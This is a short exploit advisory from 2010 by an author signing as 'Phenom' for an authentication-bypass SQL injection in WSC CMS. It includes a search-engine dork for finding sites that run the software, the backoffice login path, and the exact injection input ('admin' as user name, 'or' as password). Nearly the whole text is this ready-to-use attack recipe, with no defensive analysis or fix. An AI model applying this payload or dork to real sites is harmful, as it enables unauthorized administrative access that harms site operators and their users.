WSC CMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
bcc1de040fbcae7a0ff58e503fe48378a0a6504e451bd7a60e8fe94f9fab1657
# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
# Date: 2010-02-19
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :
------------------------------------------------------
------------------------------------------------------
_____ _
| __ \| |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################